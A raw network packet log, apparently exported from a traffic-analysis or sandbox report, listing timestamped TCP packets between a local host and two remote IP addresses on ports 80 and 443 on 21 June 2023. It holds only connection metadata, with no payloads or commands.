                                                                                                  Jun 21, 2023 20:23:47.373303890 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.373334885 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373383999 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373428106 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373435974 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.373478889 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373542070 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373589039 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373593092 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.373636007 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373683929 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373732090 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373739958 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.373795986 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373852015 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373900890 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373908043 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.373948097 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.373995066 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374039888 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374049902 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.374087095 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374157906 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374209881 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374255896 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374305964 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374334097 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.374357939 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374406099 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374449968 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.374455929 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374504089 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374507904 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.374551058 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374563932 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.374599934 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374649048 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374653101 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.374687910 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374735117 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374782085 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374804974 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.374830961 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374877930 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.374898911 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374954939 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.374982119 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.375003099 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375049114 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375055075 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.375096083 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375144958 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375190020 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.375194073 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375243902 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.375261068 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375308037 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375351906 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375399113 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375400066 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.375451088 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375458956 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.375498056 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375549078 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375581980 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375602007 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.375602007 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.375627995 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375675917 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375724077 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375771999 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375785112 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.375822067 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375869989 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375886917 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.375910997 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.375919104 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.375984907 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376040936 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376046896 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.376085997 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376133919 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376179934 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376221895 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.376226902 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376292944 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.376312017 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376378059 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376425982 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376477957 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376527071 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376532078 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.376574993 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376575947 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.376625061 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376672983 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376719952 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376766920 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376768112 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.376817942 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376867056 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376907110 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.376914978 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.376960993 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377007961 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377048016 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.377070904 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377127886 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377176046 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377223969 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377233028 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.377270937 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377320051 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377360106 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.377366066 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377429962 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377490044 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377538919 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377542019 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.377587080 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377650976 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377696037 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377696037 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.377741098 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377787113 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377830982 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377837896 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.377880096 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377880096 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.377926111 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.377970934 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378015995 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378026962 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.378061056 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378106117 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378153086 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.378168106 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378226995 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378272057 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378289938 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.378317118 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378362894 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378382921 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.378410101 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378451109 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.378457069 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378518105 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378577948 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378593922 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.378624916 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378669977 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378700972 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.378715992 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378751040 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.378762960 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378808022 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378851891 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378896952 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378906012 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.378938913 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.378958941 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.378987074 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379031897 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379039049 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.379076958 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379121065 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379123926 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.379165888 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379211903 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379234076 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.379278898 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379292011 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.379332066 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379381895 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379429102 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379465103 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.379481077 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379527092 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379575968 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379632950 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.379642010 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379692078 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379722118 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.379739046 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379786968 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379833937 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379879951 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379914999 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.379925966 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.379941940 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.379973888 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380019903 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380078077 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380141973 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380143881 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.380258083 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380285978 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.380350113 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380414009 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380490065 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380548000 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.380558014 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380608082 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380656004 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.380657911 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380702972 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.380724907 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380784988 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380835056 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380877972 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.380882025 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380930901 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.380978107 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381025076 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381042004 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.381071091 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381118059 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381162882 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.381165028 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381212950 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381261110 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381309032 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381326914 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.381372929 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381401062 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381433964 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381439924 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.381463051 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381491899 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381520033 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381530046 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.381550074 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381577969 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.381617069 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.382101059 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.382137060 CEST44349699162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.382241011 CEST44349699162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.382391930 CEST49699443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:47.383124113 CEST49699443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:23:47.383141994 CEST44349699162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.414071083 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.414129019 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.414175987 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.414242029 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.414243937 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.414314985 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.414374113 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.414380074 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.414449930 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.414494991 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.418431044 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.418483973 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.418530941 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.418548107 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.418586016 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.418621063 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.418659925 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.418721914 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.418771029 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.418797016 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.418817043 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.418864965 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.418898106 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.418909073 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.418946981 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.418953896 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.419020891 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419070959 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.419074059 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419130087 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419168949 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419203043 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419234037 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419267893 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419300079 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419336081 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419368029 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419400930 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419433117 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419465065 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419497967 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419523954 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419555902 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419589043 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419620991 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419713974 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419770956 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419785976 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.419827938 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419832945 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.419876099 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419881105 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.419923067 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.419969082 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.420017004 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.420063019 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.420070887 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.420072079 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.420109987 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.420157909 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.420226097 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.420233011 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.420294046 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.420312881 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.420368910 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.420416117 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.420466900 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.420469999 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.420516968 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.420532942 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:47.420564890 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:47.420613050 CEST8049697104.21.18.99192.168.2.4
